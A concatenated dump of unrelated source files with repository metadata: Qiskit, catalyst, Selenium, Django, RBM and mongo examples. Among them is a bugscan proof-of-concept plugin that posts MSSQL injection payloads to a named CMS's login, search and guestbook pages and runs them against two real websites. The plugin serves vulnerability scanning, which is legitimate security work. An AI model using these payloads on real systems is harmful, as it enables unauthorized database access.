        patches.Ellipse((3, 2), 0.6, 0.4),
        patches.Arc((3, 3), 0.5, 0.5, 270, 90),
    ]
    for shape in demo_patches:
        shape.set_facecolor(random_color())
        shape.set_edgecolor(random_color())
        shape.set_alpha(0.5)
        shape.set_linewidth(2)
        ax.add_patch(shape)

    # Add a static patch positioned in axes (not data) coordinates.
    ax.add_patch(patches.Rectangle((0.3, 0.4), 0.4, 0.4,
                                   fc='yellow', ec='black', alpha=0.3,
                                   transform=ax.transAxes))

    # Keep a 4:3 data aspect so the circles look round.
    ax.set_xlim(0.5, 0.5 + 3. * 4. / 3.)
    ax.set_ylim(0.5, 3.5)
    ax.set_title("Various Patches", size=16)
    return fig
if __name__ == '__main__':
    main()
    # Display the figure interactively when run as a script.
    plt.show()
| [
"vanderplas@astro.washington.edu"
] | vanderplas@astro.washington.edu |
9e9053f992d74ab70ebb2bf5c40292d1251d11e6 | 60ff82c168f247728fa88ca8e748b61876d6b5c3 | /Chrome/GuestUser/ExploreCompaniesPage/TopSection/Test_SecondHeadline.py | bbf4c1031950ca663d8ae51e6b3461ec5d0fbfb5 | [] | no_license | mariana-rusu/the.muse | 2b9bee8a7740c3f305463cbfc28ebd3bacd49907 | 58434e3ad45795cb980aca8d6b5c67132b8a855c | refs/heads/master | 2021-01-12T07:33:04.831570 | 2017-01-09T21:02:52 | 2017-01-09T21:02:52 | 76,977,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 850 | py | from selenium import webdriver
import unittest
import time
class SecondHeadline(unittest.TestCase):
    """Selenium checks for the second headline on the "Explore Companies" page."""

    def setUp(self):
        # Fresh browser per test: open the home page and click the
        # "Explore Companies" nav link.
        self.driver = webdriver.Chrome()
        self.driver.maximize_window()
        self.driver.get("https://www.themuse.com/")
        time.sleep(1)  # crude wait for the nav bar to render -- brittle
        explore_companies = self.driver.find_element_by_xpath("/html/body/header/nav[2]/a[1]")
        explore_companies.click()

    def test_Headline_is_found(self):
        # find_element_by_xpath raises NoSuchElementException if missing,
        # failing the test; the assert documents the intent.
        driver = self.driver
        assert (driver.find_element_by_xpath("//div/div/div[2]/div[1]/div/div[1]/h2"))

    def test_Headline_text_is_found(self):
        driver = self.driver
        element = driver.find_element_by_xpath("//div/div/div[2]/div[1]/div/div[1]/h2")
        self.assertEqual(element.text,"Browse offices before you apply.")

    def tearDown(self):
        # Always close the browser, even on failure.
        self.driver.quit()
"mirabelia@yahoo.com"
] | mirabelia@yahoo.com |
95f800ba3a4d4c934ae6e706cea07edfc6d46be1 | e233f9bf52ad0f88416962edd957a3c866c19b78 | /reagent/test/base/horizon_test_base.py | 676c00c95aa0b12b78c937e5cb05f5420ff12268 | [
"BSD-3-Clause"
] | permissive | dwtcourses/ReAgent | 38c99dfe47adf1471620419f744cb4145f4f4151 | b9b54d4f30ff65cf1c54dc0cf90c938b48c44f90 | refs/heads/master | 2022-04-26T15:35:46.109984 | 2020-04-29T05:38:14 | 2020-04-29T05:40:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
from reagent.tensorboardX import SummaryWriterContext
class HorizonTestBase(unittest.TestCase):
    """Base test case that isolates SummaryWriterContext global state.

    Resets the tensorboardX writer globals before and after every test so
    tests cannot leak summary-writer state into one another.
    """

    def setUp(self):
        SummaryWriterContext._reset_globals()

    def tearDown(self):
        SummaryWriterContext._reset_globals()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
48ca418ae561d715421faaa683c95b01c751cfac | 7c5304c697f858147f5a6655eef814bc32872848 | /setup.py | 6d00328ae8f4d9c7e715cc77af03403589f75a1e | [
"MIT",
"BSD-2-Clause"
] | permissive | MadisKarli/pyJuliusAlign | 2d5e644363f20cbe1265bb183df79724e12963e4 | 2e2a9951e7599f5dc83a977bc6605c515afec253 | refs/heads/master | 2022-01-06T00:37:29.734312 | 2019-02-23T23:42:37 | 2019-02-23T23:42:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 722 | py | #!/usr/bin/env python
# encoding: utf-8
'''
Created on Aug 29, 2014
@author: tmahrt
'''
from setuptools import setup
import io
# Package metadata for pyjuliusalign.
setup(name='pyjuliusalign',
      version='2.0.3',
      author='Tim Mahrt',
      author_email='timmahrt@gmail.com',
      url='https://github.com/timmahrt/pyJuliusAlign',
      package_dir={'pyjuliusalign': 'pyjuliusalign'},
      packages=['pyjuliusalign'],
      # Kana chart text files must ship inside the package wheel/sdist.
      package_data={'pyjuliusalign': ["hiraganaChart.txt", "katakanaChart.txt"]},
      license='LICENSE',
      description='A helper library for doing forced-alignment in Japanese with Julius.',
      # README is UTF-8; io.open keeps this working on Python 2 as well.
      long_description=io.open('README.md', 'r', encoding="utf-8").read(),
      long_description_content_type='text/markdown',
      )
| [
"timmahrt@gmail.com"
] | timmahrt@gmail.com |
dad36b398af2b8faf8d022d56955587525f59b3b | 1ba2b4a507783eb2051887b9ecbed85d87e4c16b | /qiskit/algorithms/aux_ops_evaluator.py | 9ce9349a7de8f236e92d1aadf7ead38d663f97ec | [
"Apache-2.0"
] | permissive | manoelmarques/qiskit-terra | 34a948605d98168b1344cee1fd6adc117a137f25 | 71dd7f7b9603e1991f9d97fef66bb9b63d552c91 | refs/heads/main | 2023-04-30T08:42:15.886082 | 2023-02-15T21:58:01 | 2023-02-15T21:58:01 | 228,042,086 | 0 | 0 | Apache-2.0 | 2019-12-14T15:07:03 | 2019-12-14T15:07:02 | null | UTF-8 | Python | false | false | 7,407 | py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2021, 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Evaluator of auxiliary operators for algorithms."""
from typing import Tuple, Union, List
import numpy as np
from qiskit import QuantumCircuit
from qiskit.opflow import (
CircuitSampler,
ListOp,
StateFn,
OperatorBase,
ExpectationBase,
)
from qiskit.providers import Backend
from qiskit.quantum_info import Statevector
from qiskit.utils import QuantumInstance
from qiskit.utils.deprecation import deprecate_function
from .list_or_dict import ListOrDict
@deprecate_function(
    "The eval_observables function has been superseded by the "
    "qiskit.algorithms.observables_evaluator.estimate_observables function. "
    "This function will be deprecated in a future release and subsequently "
    "removed after that.",
    category=PendingDeprecationWarning,
)
def eval_observables(
    quantum_instance: Union[QuantumInstance, Backend],
    quantum_state: Union[
        Statevector,
        QuantumCircuit,
        OperatorBase,
    ],
    observables: ListOrDict[OperatorBase],
    expectation: ExpectationBase,
    threshold: float = 1e-12,
) -> ListOrDict[Tuple[complex, complex]]:
    """
    Pending deprecation: Accepts a list or a dictionary of operators and calculates
    their expectation values - means
    and standard deviations. They are calculated with respect to a quantum state provided. A user
    can optionally provide a threshold value which filters mean values falling below the threshold.

    This function has been superseded by the
    :func:`qiskit.algorithms.observables_evaluator.eval_observables` function.
    It will be deprecated in a future release and subsequently
    removed after that.

    Args:
        quantum_instance: A quantum instance used for calculations.
        quantum_state: An unparametrized quantum circuit representing a quantum state that
            expectation values are computed against.
        observables: A list or a dictionary of operators whose expectation values are to be
            calculated.
        expectation: An instance of ExpectationBase which defines a method for calculating
            expectation values.
        threshold: A threshold value that defines which mean values should be neglected (helpful for
            ignoring numerical instabilities close to 0).

    Returns:
        A list or a dictionary of tuples (mean, standard deviation).

    Raises:
        ValueError: If a ``quantum_state`` with free parameters is provided.
    """
    if (
        isinstance(
            quantum_state, (QuantumCircuit, OperatorBase)
        )  # Statevector cannot be parametrized
        and len(quantum_state.parameters) > 0
    ):
        raise ValueError(
            "A parametrized representation of a quantum_state was provided. It is not "
            "allowed - it cannot have free parameters."
        )
    # Create new CircuitSampler to avoid breaking existing one's caches.
    sampler = CircuitSampler(quantum_instance)

    # Compose <state|obs|state> expressions for all observables at once.
    list_op = _prepare_list_op(quantum_state, observables)
    observables_expect = expectation.convert(list_op)
    observables_expect_sampled = sampler.convert(observables_expect)

    # compute means
    values = np.real(observables_expect_sampled.eval())

    # compute standard deviations
    std_devs = _compute_std_devs(
        observables_expect_sampled, observables, expectation, quantum_instance
    )

    # Discard values below threshold
    observables_means = values * (np.abs(values) > threshold)
    # zip means and standard deviations into tuples
    observables_results = list(zip(observables_means, std_devs))

    # Return None eigenvalues for None operators if observables is a list.
    # None operators are already dropped in compute_minimum_eigenvalue if observables is a dict.
    return _prepare_result(observables_results, observables)
def _prepare_list_op(
    quantum_state: Union[
        Statevector,
        QuantumCircuit,
        OperatorBase,
    ],
    observables: ListOrDict[OperatorBase],
) -> ListOp:
    """
    Accepts a list or a dictionary of operators and converts them to a ``ListOp``.

    Args:
        quantum_state: An unparametrized quantum circuit representing a quantum state that
            expectation values are computed against.
        observables: A list or a dictionary of operators.

    Returns:
        A ``ListOp`` that includes all provided observables.
    """
    # Dict inputs are flattened to their values; key association is
    # restored later by _prepare_result.
    if isinstance(observables, dict):
        observables = list(observables.values())

    # Wrap the state once so every observable composes with the same StateFn.
    if not isinstance(quantum_state, StateFn):
        quantum_state = StateFn(quantum_state)

    return ListOp([StateFn(obs, is_measurement=True).compose(quantum_state) for obs in observables])
def _prepare_result(
observables_results: List[Tuple[complex, complex]],
observables: ListOrDict[OperatorBase],
) -> ListOrDict[Tuple[complex, complex]]:
"""
Prepares a list or a dictionary of eigenvalues from ``observables_results`` and
``observables``.
Args:
observables_results: A list of of tuples (mean, standard deviation).
observables: A list or a dictionary of operators whose expectation values are to be
calculated.
Returns:
A list or a dictionary of tuples (mean, standard deviation).
"""
if isinstance(observables, list):
observables_eigenvalues = [None] * len(observables)
key_value_iterator = enumerate(observables_results)
else:
observables_eigenvalues = {}
key_value_iterator = zip(observables.keys(), observables_results)
for key, value in key_value_iterator:
if observables[key] is not None:
observables_eigenvalues[key] = value
return observables_eigenvalues
def _compute_std_devs(
    observables_expect_sampled: OperatorBase,
    observables: ListOrDict[OperatorBase],
    expectation: ExpectationBase,
    quantum_instance: Union[QuantumInstance, Backend],
) -> List[complex]:
    """
    Calculates a list of standard deviations from expectation values of observables provided.

    Args:
        observables_expect_sampled: Expected values of observables.
        observables: A list or a dictionary of operators whose expectation values are to be
            calculated.
        expectation: An instance of ExpectationBase which defines a method for calculating
            expectation values.
        quantum_instance: A quantum instance used for calculations.

    Returns:
        A list of standard deviations.
    """
    variances = np.real(expectation.compute_variance(observables_expect_sampled))
    if not isinstance(variances, np.ndarray) and variances == 0.0:
        # when `variances` is a single value equal to 0., our expectation value is exact and we
        # manually ensure the variances to be a list of the correct length
        variances = np.zeros(len(observables), dtype=float)
    # Standard error of the mean over the configured shot count.
    std_devs = np.sqrt(variances / quantum_instance.run_config.shots)
    return std_devs
| [
"noreply@github.com"
] | manoelmarques.noreply@github.com |
5d268dd6a1d73ac3491ec9214064db7e76186d8e | f6db8d85a3b41eed543959314d65927353a8229c | /.history/W5/restaurant/forms_20201202155445.py | 54887e8fa52493f1ec9492f492ded07847b4da12 | [] | no_license | NFEL/DjangoPaeez99 | d573cc8e36500f08bc104d76f7a2628062d86c2f | 621636bfb47d71f2a4f45037b7264dd5ebc7cdd7 | refs/heads/main | 2023-01-27T22:05:57.788049 | 2020-12-08T10:08:28 | 2020-12-08T10:08:28 | 304,553,353 | 1 | 2 | null | 2020-10-16T07:33:04 | 2020-10-16T07:33:03 | null | UTF-8 | Python | false | false | 219 | py | from django import forms
# from django.db.models import fields
from .models import ElementAddress
class NearByReastaurants(forms.ModelForm):
    # ModelForm exposing only the "element" picker from ElementAddress.
    # NOTE(review): class name misspells "Restaurants"; renaming would
    # break existing imports, so it is left as-is.
    class Meta:
        model = ElementAddress
        fields = ('element',)
"nfilsaraee@gmail.com"
] | nfilsaraee@gmail.com |
54fac0e0c625b35779f704ceba5b0921fa2f22a7 | 74faed0c7465e7fa629400ddfdcfd58f66a6d6e3 | /manage.py | 2b0a775b4b720d0487a55eea64bf1dabb56717ae | [] | no_license | dengshilong/test-flask | 5952dc28d39588705f71bc87cba6c50fcb959e92 | 847c51ea524e6ffde211ca41c82f21997cf02899 | refs/heads/master | 2021-01-19T20:08:01.744585 | 2017-04-17T09:17:22 | 2017-04-17T09:17:22 | 88,488,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | #!/usr/bin/env python
# pylint: disable=wrong-import-position
import os
from test_flask import create_app, db
from flask_script import Manager, Shell
from flask_migrate import Migrate, MigrateCommand
from test_flask.models import User, Address
# Build the application from FLASK_CONFIG (falls back to "default").
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
manager = Manager(app)
migrate = Migrate(app, db)


def make_shell_context():
    # Objects pre-imported into the "shell" command's namespace.
    return dict(app=app, db=db, User=User, Address=Address)

manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)


@manager.command
def test():
    """Run the unit tests."""
    # Local import: unittest is only needed for this command.
    import unittest
    tests = unittest.TestLoader().discover('tests')
    unittest.TextTestRunner(verbosity=2).run(tests)


if __name__ == '__main__':
    manager.run()
"dengshilong1988@gmail.com"
] | dengshilong1988@gmail.com |
37dee3f1ada38b2abb4fe10458182260e4944d89 | a045c20593669cbb82395e58dc116154d5c6c86b | /stalker_hud_rig_helper/ui.py | 869ecbe3aee0c3af278fed8ba20c965e1b6658e9 | [] | no_license | PavelBlend/blender-stalker-hud-rig-helper-addon | 4eba43cf49c1b815048d54ad1205456e9ea3eb92 | 6ebeabbca92788cdb70f4cb286bf6f5b6e47b014 | refs/heads/master | 2020-06-04T20:23:39.285879 | 2019-06-16T09:38:18 | 2019-06-16T09:38:18 | 192,179,043 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,584 | py | import bpy
class _ListOp(bpy.types.Operator):
    """Generic add/remove/move operator for a UI collection list.

    The target collection and index property names are passed in as
    operator string properties; the owning datablock is handed over via a
    context pointer set by draw_list_ops().
    """
    bl_idname = 'io_scene_xray.list'
    bl_label = ''

    # 'add' | 'remove' | 'move_up' | 'move_down'
    operation = bpy.props.StringProperty()
    # Name of the CollectionProperty on the datablock.
    collection = bpy.props.StringProperty()
    # Name of the active-index property on the datablock.
    index = bpy.props.StringProperty()

    def execute(self, context):
        # Fetch the datablock stashed by draw_list_ops via context_pointer_set.
        data = getattr(context, _ListOp.bl_idname + '.data')
        collection = getattr(data, self.collection)
        index = getattr(data, self.index)
        if self.operation == 'add':
            collection.add().name = ''
        elif self.operation == 'remove':
            collection.remove(index)
            # Keep the active index in range after deletion.
            if index > 0:
                setattr(data, self.index, index - 1)
        elif self.operation == 'move_up':
            collection.move(index, index - 1)
            setattr(data, self.index, index - 1)
        elif self.operation == 'move_down':
            collection.move(index, index + 1)
            setattr(data, self.index, index + 1)
        return {'FINISHED'}
def draw_list_ops(layout, dataptr, propname, active_propname):
    """Draw add/remove/move-up/move-down buttons for a collection list.

    Args:
        layout: UILayout to draw into.
        dataptr: datablock owning the collection.
        propname: name of the collection property on dataptr.
        active_propname: name of the active-index property on dataptr.
    """
    def operator(operation, icon, enabled=None):
        lay = layout
        if (enabled is not None) and (not enabled):
            # Draw a disabled (greyed-out) button in its own sub-layout.
            lay = lay.split(align=True)
            lay.enabled = False
        operator = lay.operator(_ListOp.bl_idname, icon=icon)
        operator.operation = operation
        operator.collection = propname
        operator.index = active_propname

    # Hand the datablock to _ListOp.execute through the context.
    layout.context_pointer_set(_ListOp.bl_idname + '.data', dataptr)
    operator('add', 'ZOOMIN')
    collection = getattr(dataptr, propname)
    index = getattr(dataptr, active_propname)
    # Enable each button only when the move/remove is actually possible.
    operator('remove', 'ZOOMOUT', enabled=(index >= 0) and (index < len(collection)))
    operator('move_up', 'TRIA_UP', enabled=(index > 0) and (index < len(collection)))
    operator('move_down', 'TRIA_DOWN', enabled=(index >= 0) and (index < len(collection) - 1))
class BoneList(bpy.types.UIList):
    """Row renderer for the hand/weapon/offset bone mapping list."""

    def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
        obj = context.object
        stk_data = obj.data.stalker_rig_helper
        # Checked icon marks the active row.
        if stk_data.bone_collection_index == index:
            icon = 'CHECKBOX_HLT'
        else:
            icon = 'CHECKBOX_DEHLT'
        bone = stk_data.bone_collection[index]
        row = layout.row()
        row.label(text='', icon=icon)
        row.prop_search(bone, 'hand_bone', obj.data, 'bones', text='')
        # NOTE(review): wpn_obj may be None when weapon_armature is unset
        # or renamed; the panel guards before drawing the list, but a stale
        # name would raise AttributeError on .data here -- confirm.
        wpn_obj = bpy.data.objects.get(stk_data.weapon_armature, None)
        row.prop_search(bone, 'wpn_bone', wpn_obj.data, 'bones', text='')
        row.prop_search(bone, 'offset_bone', obj.data, 'bones', text='')
class STALKER_HUD_Rig_Helper_Panel(bpy.types.Panel):
    """Armature-data panel for pairing hand bones with weapon bones."""
    bl_space_type = "PROPERTIES"
    bl_region_type = "WINDOW"
    bl_context = "data"
    bl_options = {'DEFAULT_CLOSED'}
    bl_label = 'STALKER HUD Rig Helper'

    @classmethod
    def poll(cls, context):
        # Only show the panel for armature objects.
        if not context.object:
            return False
        return context.object.type == 'ARMATURE'

    def draw(self, context):
        obj = context.object
        stk_data = obj.data.stalker_rig_helper
        lay = self.layout
        row = lay.row()
        # Until a valid, distinct weapon armature is chosen, draw only the
        # selector and bail out.
        wpn_obj = bpy.data.objects.get(stk_data.weapon_armature, None)
        if not wpn_obj:
            row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
            return
        if wpn_obj.type != 'ARMATURE':
            row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
            return
        if wpn_obj.name == obj.name:
            # The weapon armature must be a different object.
            row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
            return
        row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
        # Column headers for the three bone columns.
        row = lay.row()
        row.label('Hand Bones')
        row.label(icon='FORWARD')
        row.label('Weapon Bones')
        row.label(icon='FORWARD')
        row.label('Offset Bones')
        row = lay.row()
        col = row.column()
        col.template_list(
            'BoneList', 'name',
            stk_data, 'bone_collection',
            stk_data, 'bone_collection_index'
        )
        # Side column with the add/remove/move buttons.
        col = row.column(align=True)
        draw_list_ops(
            col, stk_data,
            'bone_collection', 'bone_collection_index',
        )
        lay.operator('stalker_rig_helper.tie_weapon')
def register():
    # Register operator and list before the panel that references them.
    bpy.utils.register_class(_ListOp)
    bpy.utils.register_class(BoneList)
    bpy.utils.register_class(STALKER_HUD_Rig_Helper_Panel)


def unregister():
    # Unregister in reverse order of registration.
    bpy.utils.unregister_class(STALKER_HUD_Rig_Helper_Panel)
    bpy.utils.unregister_class(BoneList)
    bpy.utils.unregister_class(_ListOp)
| [
"stalkermodkytia@yandex.ru"
] | stalkermodkytia@yandex.ru |
3bb521fa84719f1797e0bb0b6e9dc5230ea3ed5a | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/11c6ffa2-1596.py | 634f6b84e257b4ab196fc2c9b9eed72c5fc1cb73 | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,556 | py | #coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
#author:小光
#refer:http://www.wooyun.org/bugs/wooyun-2010-070091
#refer:http://www.wooyun.org/bugs/wooyun-2010-077673
#refer:http://www.wooyun.org/bugs/wooyun-2010-082926
def assign(service, arg):
    # Only handle targets tagged as the "jienuohan" service; other
    # services implicitly return None (skipped by the scanner).
    if service == "jienuohan":
        return True, arg
def audit(arg):
    """Probe known jienuohan CMS endpoints for SQL injection.

    Each POST body injects a db_name()/convert() expression; a response
    containing "master" indicates the injected query was executed.
    """
    # Endpoint paths, paired index-for-index with the POST bodies below.
    payloads = [
        'Web/Login.aspx',
        'web/KeySearch.aspx?searchid=1',
        'KeySearch.aspx',
        'KeySearch.aspx',
        'KeySearch.aspx',
        'liuyan.aspx',
        'liuyan.aspx',
        'liuyan.aspx',
    ]
    # URL-encoded injection payloads (error-based, MSSQL db_name/convert).
    postdatas = [
        'username=1%27%20and%20db_name%281%29%3E1--',
        'operat=Search&state=&keyword=1%25%27%20and%20db_name%281%29%3E1--',
        'title=1%27%20AND%20db_name%281%29%3E1--',
        'author=1%27%20AND%20db_name%281%29%3E1--',
        'keyword=1%27%20AND%20db_name%281%29%3E1--',
        'LinkTel=1%27%2b%20convert%28int%2C%28db_name%281%29%29%29%20%2b%27',
        'Mail=1%27%2b%20convert%28int%2C%28db_name%281%29%29%29%20%2b%27',
        'username=1%27%2b%20%28select%20convert%28int%2C%28@@version%29%29%20FROM%20syscolumns%29%20%2b%27'
    ]
    for i in range(8):
        url = arg + payloads[i]
        code, head, res, errcode, _ = curl.curl2(url,postdatas[i])
        # "master" in the response means the DB name leaked -> vulnerable.
        if 'master' in res :
            security_hole(arg+payloads[i])
if __name__ == '__main__':
    # Standalone smoke test against two known installations.
    from dummy import *
    audit(assign('jienuohan','http://www.cnemergency.com/')[1])
    audit(assign('jienuohan','http://ctc.hlglzz.com/')[1])
| [
"yudekui@wsmtec.com"
] | yudekui@wsmtec.com |
bf5ff7b4246763917fcc89424e632f404a4f5308 | af41c215f420bbd66067d6dc851ce41d9ed40819 | /GBRBM/test_mini_movie.py | ad0397fa82fa6eb437eb6ead354ff9ac8e500f35 | [] | no_license | danathughes/pyNeuralNetwork | b704f525bddbc64eabf33c1174dad0649be7bfd9 | dbe2090e50434f33ac7a46845ad67eb5dc7dea87 | refs/heads/master | 2021-01-01T16:30:47.781646 | 2016-01-27T23:11:51 | 2016-01-27T23:11:51 | 19,729,930 | 0 | 4 | null | 2015-02-27T22:22:18 | 2014-05-13T07:32:24 | Python | UTF-8 | Python | false | false | 987 | py | from RBM import *
def get_RBM():
    """Train a 6-visible / 2-hidden RBM on a tiny movie-rating dataset.

    Uses CD-k with k=9 over a decreasing learning-rate schedule, printing
    free energy, pseudolikelihood and likelihood every epoch.  Python 2
    print-statement syntax.

    Returns:
        (trained RBM, training dataset)
    """
    r = RBM(6,2)
    k = 9
    # Two user clusters: first three rows favour movies 1-3, last three
    # favour movies 3-5.
    dataset = [[0.9,0.8,0.9,0.1,0.2,0.2],
               [0.9,0.4,0.8,0.2,0.1,0.2],
               [0.8,1.0,0.9,0.0,0.1,0.0],
               [0.1,0.1,0.9,0.8,1.0,0.2],
               [0.2,0.1,0.9,0.9,0.9,0.1],
               [0.1,0.2,1.0,0.9,0.8,0.1]]

    # Train at the following learning rates:
    print "Training..."
    learning_rates = [0.1, 0.05, 0.01, 0.005, 0.001, 0.0005, 0.0001]
#   learning_rates = [0.1]
    for rate in learning_rates:
        print "Learning rate =", rate
        # 100 epochs per learning rate, with diagnostics after each epoch.
        for i in range(100):
            print ' ' + str(i) + '...',
            r.train_epoch(dataset, rate, k)
            err = np.sum([r.free_energy(data) for data in dataset])
            print 'Energy = ' + str(err) + '...',
            PL = r.pseudolikelihood(dataset)
            print 'Pseudolikelihood = ' + str(PL) + '...',
            L = r.likelihood(dataset)
            print 'Likelihood = ' + str(L) + '...',
            print 'Done'
    return r, dataset
| [
"danathughes@gmail.com"
] | danathughes@gmail.com |
276efaa89b7025eb62f18860f10c254de3df0147 | 26edf9a7a579782e72753c82082047ebe23a5080 | /catalyst/contrib/models/cv/segmentation/blocks/fpn.py | 2c3106814fe5f3f1db7a7f92fde028fe271e8148 | [
"Apache-2.0"
] | permissive | 418sec/catalyst | e8578c3561d54053bf53cb065d5ab516a2c505e9 | 8ce39fc31635eabc348b055a2df8ec8bc5700dce | refs/heads/master | 2023-02-17T22:18:57.257809 | 2021-01-21T09:27:46 | 2021-01-21T09:27:46 | 327,367,304 | 0 | 1 | Apache-2.0 | 2021-01-21T09:27:47 | 2021-01-06T16:24:31 | null | UTF-8 | Python | false | false | 3,708 | py | # flake8: noqa
# @TODO: code formatting issue for 20.07 release
import torch
from torch import nn
from torch.nn import functional as F
from catalyst.contrib.models.cv.segmentation.blocks.core import DecoderBlock
class DecoderFPNBlock(DecoderBlock):
    """FPN decoder step: upsample the deeper map and add a 1x1-projected skip.

    The encoder ("left") features are projected to ``out_channels`` with a
    1x1 convolution, then summed with the upsampled deeper ("bottom")
    features.
    """

    def __init__(
        self,
        in_channels: int,
        enc_channels: int,
        out_channels: int,
        in_strides: int = None,
        upsample_scale: int = 2,
        interpolation_mode: str = "nearest",
        align_corners: bool = None,
        aggregate_first: bool = False,
        **kwargs
    ):
        """
        Args:
            in_channels: channels of the bottom (deeper) feature map.
            enc_channels: channels of the encoder skip connection.
            out_channels: channels of the produced feature map.
            in_strides: stride of the input features, if known.
            upsample_scale: scale factor for upsampling the bottom features.
            interpolation_mode: mode passed to F.interpolate.
            align_corners: align_corners flag for F.interpolate.
            aggregate_first: accepted for interface parity; not used here.
        """
        # Store interpolation settings before the base class builds the
        # block (super().__init__ calls _get_block).
        self.upsample_scale = upsample_scale
        self.interpolation_mode = interpolation_mode
        self.align_corners = align_corners
        super().__init__(
            in_channels, enc_channels, out_channels, in_strides, **kwargs
        )

    def _get_block(self):
        # 1x1 projection of the encoder features to the decoder width.
        block = nn.Conv2d(self.enc_channels, self.out_channels, kernel_size=1)
        return block

    def forward(
        self, bottom: torch.Tensor, left: torch.Tensor
    ) -> torch.Tensor:
        """Upsample ``bottom`` and add the projected ``left`` skip features."""
        x = F.interpolate(
            bottom,
            scale_factor=self.upsample_scale,
            mode=self.interpolation_mode,
            align_corners=self.align_corners,
        )
        left = self.block(left)
        x = x + left
        return x
class Conv3x3GNReLU(nn.Module):
    """3x3 Conv -> GroupNorm(32 groups) -> ReLU, with optional upsampling.

    When ``upsample`` is set, the activation is interpolated by
    ``upsample_scale`` after the conv block.
    """

    def __init__(
        self,
        in_channels,
        out_channels,
        upsample=False,
        upsample_scale: int = 2,
        interpolation_mode: str = "bilinear",
        align_corners: bool = True,
    ):
        """
        Args:
            in_channels: channels of the input feature map.
            out_channels: channels produced (must be divisible by 32 for
                the GroupNorm).
            upsample: whether to interpolate after the conv block.
            upsample_scale: spatial scale factor for interpolation.
            interpolation_mode: mode passed to F.interpolate.
            align_corners: align_corners flag for F.interpolate.
        """
        super().__init__()
        self.upsample = upsample
        self.upsample_scale = upsample_scale
        self.interpolation_mode = interpolation_mode
        self.align_corners = align_corners
        conv = nn.Conv2d(
            in_channels,
            out_channels,
            kernel_size=3,
            stride=1,
            padding=1,
            bias=False,  # GroupNorm supplies the affine shift
        )
        self.block = nn.Sequential(
            conv,
            nn.GroupNorm(32, out_channels),
            nn.ReLU(inplace=True),
        )

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """Apply conv-GN-ReLU, then optional spatial upsampling."""
        out = self.block(x)
        if not self.upsample:
            return out
        return F.interpolate(
            out,
            scale_factor=self.upsample_scale,
            mode=self.interpolation_mode,
            align_corners=self.align_corners,
        )
class SegmentationBlock(nn.Module):
    """Stack of Conv3x3GNReLU blocks upsampling by 2**num_upsamples overall.

    The first block upsamples only when ``num_upsamples`` is non-zero;
    every additional block upsamples by another factor of two.
    """

    def __init__(
        self, in_channels: int, out_channels: int, num_upsamples: int = 0
    ):
        """
        Args:
            in_channels: channels of the input feature map.
            out_channels: channels of every block in the stack.
            num_upsamples: number of x2 upsampling steps to perform.
        """
        super().__init__()
        layers = [
            Conv3x3GNReLU(
                in_channels, out_channels, upsample=bool(num_upsamples)
            )
        ]
        # One extra upsampling block per remaining factor of two.
        layers.extend(
            Conv3x3GNReLU(out_channels, out_channels, upsample=True)
            for _ in range(1, num_upsamples)
        )
        self.block = nn.Sequential(*layers)

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """Run the input through the conv/upsample stack."""
        return self.block(x)
__all__ = ["DecoderFPNBlock", "Conv3x3GNReLU", "SegmentationBlock"]
| [
"noreply@github.com"
] | 418sec.noreply@github.com |
a5675c5781886c2efa317d61bb02a5aa1e60eabe | 3be8b5d0334de1f3521dd5dfd8a58704fb8347f9 | /dependencies/mongo/example/nested_reference.py | a69614dea4ae0d495a5995665ac30ce01e296563 | [
"MIT"
] | permissive | bmillham/djrq2 | 21a8cbc3087d7ad46087cd816892883cd276db7d | 5f357b3951600a9aecbe6c50727891b1485df210 | refs/heads/master | 2023-07-07T01:07:35.093669 | 2023-06-26T05:21:33 | 2023-06-26T05:21:33 | 72,969,773 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # encoding: utf-8
from marrow.mongo.document import Document
from marrow.mongo.field import ObjectId, String, Embed
class Sample(Document):
    # Example marrow.mongo document with an embedded sub-document.
    class Nested(Document):
        name = String()
        reference = ObjectId()

    # Maps onto the MongoDB `_id` field.
    id = ObjectId('_id')
    # `default` builds an empty Nested; `assign` stores that default on
    # construction (see the default=lambda/assign=True arguments below).
    nested = Embed(Nested, default=lambda: Nested(), assign=True)
from pprint import pprint

# Demo: `==` on document fields builds query fragments rather than plain
# booleans (presumably marrow.mongo Ops objects — verify against the library).
pprint(Sample.id == None)
pprint(Sample.nested.name == "Alice")
| [
"bmillham@gmail.com"
] | bmillham@gmail.com |
41cc6093c3c0a68f6f0a994159f9a2551570180c | 5a281cb78335e06c631181720546f6876005d4e5 | /karbor-1.3.0/karbor/services/operationengine/engine/triggers/timetrigger/timeformats/crontab_time.py | e11467c8c185fbb93e1b6e2cce38bebbd4bd4c07 | [
"Apache-2.0"
